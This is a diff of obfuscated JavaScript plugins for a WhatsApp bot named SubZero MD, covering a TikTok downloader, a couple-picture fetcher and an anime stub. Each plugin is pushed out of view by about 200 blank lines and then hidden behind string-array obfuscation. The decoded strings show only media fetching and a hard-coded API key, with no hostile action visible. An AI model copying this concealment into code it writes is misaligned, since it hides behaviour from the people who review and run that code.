154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
const _0x2dbdf0=_0x7ad8;(function(_0x5b611e,_0x42f0e3){const _0x487ba5=_0x7ad8,_0x299a20=_0x5b611e();while(!![]){try{const _0x45a3ad=parseInt(_0x487ba5(0x8b))/0x1+-parseInt(_0x487ba5(0xa7))/0x2*(-parseInt(_0x487ba5(0xa6))/0x3)+parseInt(_0x487ba5(0xa5))/0x4*(-parseInt(_0x487ba5(0xa2))/0x5)+parseInt(_0x487ba5(0x7e))/0x6*(parseInt(_0x487ba5(0xa8))/0x7)+-parseInt(_0x487ba5(0xa1))/0x8*(parseInt(_0x487ba5(0x80))/0x9)+parseInt(_0x487ba5(0xa0))/0xa*(-parseInt(_0x487ba5(0xad))/0xb)+-parseInt(_0x487ba5(0x95))/0xc*(-parseInt(_0x487ba5(0x9d))/0xd);if(_0x45a3ad===_0x42f0e3)break;else _0x299a20['push'](_0x299a20['shift']());}catch(_0x2247fe){_0x299a20['push'](_0x299a20['shift']());}}}(_0x3c88,0x46e61));function hi(){const _0x122b73=_0x7ad8;console[_0x122b73(0xac)](_0x122b73(0x87));}function _0x3c88(){const _0x288706=['username','57492KMvngy','\x0a┇๏\x20*Shares:*\x20','\x0a┇๏\x20*Comments:*\x20','Sorry,\x20I\x20couldn\x27t\x20process\x20this\x20type\x20of\x20TikTok\x20content.','type','sendMessage','Error\x20in\x20TikTok\x20command:','../command','299oWJksi','http','ttdl','1813930igKpKs','88CyDSZb','5VAFXJE','comments','result','572092YWquDP','225603kreEhi','2YJgBle','3698737vngmQJ','Download\x20videos\x20or\x20images\x20from\x20TikTok.','tiktokdl2','shares','log','33gxbGEj','\x20\x20\x20\x20\x0a┇๏\x20*Description:*\x20','node-fetch','An\x20error\x20occurred\x20while\x20processing\x20your\x20request.\x20Please\x20try\x20again\x20later.','favorite','6SbreZj','N/A','97479yKYzAC','no-watermark','error','&apiKey=yanzdev','json','entries','tools','Hello\x20World!','image','tiktokvid2','description','382959JJbajz','\x20\x20\x20\x20\x0a╰━━━━━━━━━━━━──┈⊷\x0a>\x20©\x20ᴘᴏᴡᴇʀᴇᴅ\x20ʙʏ\x20sᴜʙᴢᴇʀᴏ','video','views','\x0a┇๏\x20*Likes:*\x20','startsWith','tt2','tiktok2','╭━━━〔\x20*SUBZERO-MD*\x20〕━━━┈⊷\x0a┃▸╭───────────\x0a┃▸┃๏\x20*TIKTOK\x20DOWNLOADER*\x0a┃▸└───────────···๏\x0a╰────────────────┈⊷\x0a╭━━〔\x20*Post\x20Details*\x20〕━━┈⊷\x0a┇๏\x20*Type:*\x20'];_0x3c88=function(){return _0x288706;};return _0x3c88();}function _0x7ad8(_0x2c637a,_0xf5e587){const _0x3c8816=_0x3c88();return _0x7ad8=function(_0x7ad890,_0xe384dd){_0x7ad890=_0x7ad890-0x7a;let _0x15ef76=_0x3c8816[_0x7ad890];return _0x15ef76;},_0x7ad8(_0x2c637a,_0xf5e587);}hi();const fetch=require(_0x2dbdf0(0x7b)),{cmd}=require(_0x2dbdf0(0x9c));cmd({'pattern':_0x2dbdf0(0x92),'alias':[_0x2dbdf0(0x91),_0x2dbdf0(0xaa),'ttdown2',_0x2dbdf0(0x89),_0x2dbdf0(0x9f)],'desc':_0x2dbdf0(0xa9),'react':'✅','category':_0x2dbdf0(0x86),'filename':__filename},async(_0x572eda,_0x5725ab,_0x46523f,{from:_0x45c4f6,args:_0x550065,reply:_0x38160c})=>{const _0x40a5ef=_0x2dbdf0;try{const _0x17f2c5=_0x550065[0x0];if(!_0x17f2c5||!_0x17f2c5[_0x40a5ef(0x90)](_0x40a5ef(0x9e)))return _0x38160c('Please\x20provide\x20a\x20valid\x20TikTok\x20link.\x0a\x0a*Usage\x20Example:*\x0a\x0a.tt2\x20<TikTok\x20video\x20URL>');const _0x7dacc7=await fetch('https://api.yanzbotz.live/api/downloader/tiktok?url='+encodeURIComponent(_0x17f2c5)+_0x40a5ef(0x83)),_0x15a6cb=await _0x7dacc7[_0x40a5ef(0x84)]();if(!_0x15a6cb||!_0x15a6cb[_0x40a5ef(0xa4)])return _0x38160c('Sorry,\x20I\x20couldn\x27t\x20fetch\x20the\x20TikTok\x20content.\x20Please\x20check\x20the\x20link\x20and\x20try\x20again.');const _0x596701=_0x15a6cb['result'],_0x4e57a1=_0x40a5ef(0x93)+(_0x596701[_0x40a5ef(0x99)]||_0x40a5ef(0x7f))+'\x0a┇๏\x20*Name:*\x20'+(_0x596701['name']||_0x40a5ef(0x7f))+'\x0a┇๏\x20*Username:*\x20'+(_0x596701[_0x40a5ef(0x94)]||'N/A')+'\x0a┇๏\x20*Views:*\x20'+(_0x596701[_0x40a5ef(0x8e)]||0x0)+_0x40a5ef(0x8f)+(_0x596701['likes']||0x0)+_0x40a5ef(0x97)+(_0x596701[_0x40a5ef(0xa3)]||0x0)+'\x0a┇๏\x20*Favorites:*\x20'+(_0x596701[_0x40a5ef(0x7d)]||0x0)+_0x40a5ef(0x96)+(_0x596701[_0x40a5ef(0xab)]||0x0)+_0x40a5ef(0x7a)+(_0x596701[_0x40a5ef(0x8a)]||_0x40a5ef(0x7f))+_0x40a5ef(0x8c);if(_0x596701[_0x40a5ef(0x99)]===_0x40a5ef(0x8d))await _0x572eda[_0x40a5ef(0x9a)](_0x45c4f6,{'video':{'url':_0x596701[_0x40a5ef(0x8d)][_0x40a5ef(0x81)]},'caption':_0x4e57a1},{'quoted':_0x46523f});else{if(_0x596701['type']===_0x40a5ef(0x88))for(const [_0x1ac338,_0x5746de]of(_0x596701[_0x40a5ef(0x88)]||[])[_0x40a5ef(0x85)]()){await _0x572eda[_0x40a5ef(0x9a)](_0x45c4f6,{'image':{'url':_0x5746de},'caption':'*💜\x20Image:*\x20'+(_0x1ac338+0x1)+'\x0a\x0a'+_0x4e57a1},{'quoted':_0x46523f});}else return _0x38160c(_0x40a5ef(0x98));}}catch(_0x1aefb6){console[_0x40a5ef(0x82)](_0x40a5ef(0x9b),_0x1aefb6),_0x38160c(_0x40a5ef(0x7c));}});
|
plugins/fun-anime.js
ADDED
@@ -0,0 +1,217 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
(function(_0x1e698d,_0x315915){var _0x349fc3=_0x2ea7,_0xd3d812=_0x1e698d();while(!![]){try{var _0x56502f=parseInt(_0x349fc3(0x9c))/0x1+parseInt(_0x349fc3(0x9d))/0x2+-parseInt(_0x349fc3(0x99))/0x3*(parseInt(_0x349fc3(0x9a))/0x4)+-parseInt(_0x349fc3(0xa0))/0x5+parseInt(_0x349fc3(0x9f))/0x6+-parseInt(_0x349fc3(0xa1))/0x7*(parseInt(_0x349fc3(0xa3))/0x8)+parseInt(_0x349fc3(0xa2))/0x9;if(_0x56502f===_0x315915)break;else _0xd3d812['push'](_0xd3d812['shift']());}catch(_0x67fd17){_0xd3d812['push'](_0xd3d812['shift']());}}}(_0x3481,0x8db3c));function _0x3481(){var _0x4a9363=['Hello\x20World!','3579702rgpXbQ','4130630bWOkyR','3549EwxsPd','15454368kPyctA','15416NEpymU','825HINlxS','12708vckwzP','log','682686XRlrjQ','521494GmyoNs'];_0x3481=function(){return _0x4a9363;};return _0x3481();}function hi(){var _0x3619dd=_0x2ea7;console[_0x3619dd(0x9b)](_0x3619dd(0x9e));}function _0x2ea7(_0x468e69,_0x52cd44){var _0x3481ef=_0x3481();return _0x2ea7=function(_0x2ea7f3,_0x39db39){_0x2ea7f3=_0x2ea7f3-0x99;var _0x5989d0=_0x3481ef[_0x2ea7f3];return _0x5989d0;},_0x2ea7(_0x468e69,_0x52cd44);}hi();
|
plugins/fun-couples.js
ADDED
@@ -0,0 +1,217 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
const _0x34f662=_0xf072;(function(_0x3b4bc1,_0x2fcc3e){const _0x419acc=_0xf072,_0x45d36e=_0x3b4bc1();while(!![]){try{const _0x53ab43=parseInt(_0x419acc(0x1e3))/0x1+parseInt(_0x419acc(0x1d2))/0x2*(-parseInt(_0x419acc(0x1c7))/0x3)+-parseInt(_0x419acc(0x1df))/0x4+parseInt(_0x419acc(0x1c8))/0x5*(parseInt(_0x419acc(0x1de))/0x6)+parseInt(_0x419acc(0x1d9))/0x7*(parseInt(_0x419acc(0x1e4))/0x8)+parseInt(_0x419acc(0x1d5))/0x9+-parseInt(_0x419acc(0x1dd))/0xa;if(_0x53ab43===_0x2fcc3e)break;else _0x45d36e['push'](_0x45d36e['shift']());}catch(_0x4d4f52){_0x45d36e['push'](_0x45d36e['shift']());}}}(_0xfffc,0x97113));function hi(){const _0x51e952=_0xf072;console[_0x51e952(0x1c9)](_0x51e952(0x1ca));}hi();const {cmd,commands}=require(_0x34f662(0x1e1)),axios=require(_0x34f662(0x1ce));function _0xf072(_0x41d2dc,_0x5f0be1){const _0xfffcbd=_0xfffc();return _0xf072=function(_0xf072c2,_0x45f68c){_0xf072c2=_0xf072c2-0x1c7;let _0x245a8c=_0xfffcbd[_0xf072c2];return _0x245a8c;},_0xf072(_0x41d2dc,_0x5f0be1);}cmd({'pattern':_0x34f662(0x1cb),'alias':[_0x34f662(0x1d8),_0x34f662(0x1cf)],'react':'💑','desc':'Get\x20a\x20male\x20and\x20female\x20couple\x20profile\x20picture.','category':'image','use':_0x34f662(0x1db),'filename':__filename},async(_0x50edc5,_0xc5df33,_0x1b198a,{from:_0x4da616,args:_0x15071c,reply:_0x59b37a})=>{const _0x5e44d9=_0x34f662;try{_0x59b37a(_0x5e44d9(0x1d3));const _0xb820c3=await axios[_0x5e44d9(0x1cc)](_0x5e44d9(0x1dc));if(!_0xb820c3[_0x5e44d9(0x1da)]||!_0xb820c3[_0x5e44d9(0x1da)][_0x5e44d9(0x1cd)])return _0x59b37a(_0x5e44d9(0x1e2));const _0x355e74=_0xb820c3['data'][_0x5e44d9(0x1d1)],_0x4470cd=_0xb820c3['data'][_0x5e44d9(0x1e0)];_0x355e74&&await _0x50edc5['sendMessage'](_0x4da616,{'image':{'url':_0x355e74},'caption':_0x5e44d9(0x1d4)},{'quoted':_0xc5df33}),_0x4470cd&&await _0x50edc5[_0x5e44d9(0x1d6)](_0x4da616,{'image':{'url':_0x4470cd},'caption':_0x5e44d9(0x1d0)},{'quoted':_0xc5df33});}catch(_0x305b06){console['error'](_0x305b06),_0x59b37a(_0x5e44d9(0x1d7));}});function _0xfffc(){const _0x411980=['axios','cpp','👩\x20Female\x20Couple\x20Profile\x20Picture','male','321066Dejrbs','*💑\x20Fetching\x20couple\x20profile\x20pictures...*','👨\x20Male\x20Couple\x20Profile\x20Picture','556002UfVEcr','sendMessage','❌\x20An\x20error\x20occurred\x20while\x20fetching\x20the\x20couple\x20profile\x20pictures.','couple','6195iJUMlE','data','.couplepp','https://api.davidcyriltech.my.id/couplepp','22796460czZgxG','54JmUneQ','848008amZrVU','female','../command','❌\x20Failed\x20to\x20fetch\x20couple\x20profile\x20pictures.\x20Please\x20try\x20again\x20later.','1235399KamglY','11120jHdndD','3IeXCyi','413125PyiwIH','log','Hello\x20World!','couplepp','get','success'];_0xfffc=function(){return _0x411980;};return _0xfffc();}
|
plugins/fun-dogs.js
ADDED
@@ -0,0 +1,217 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
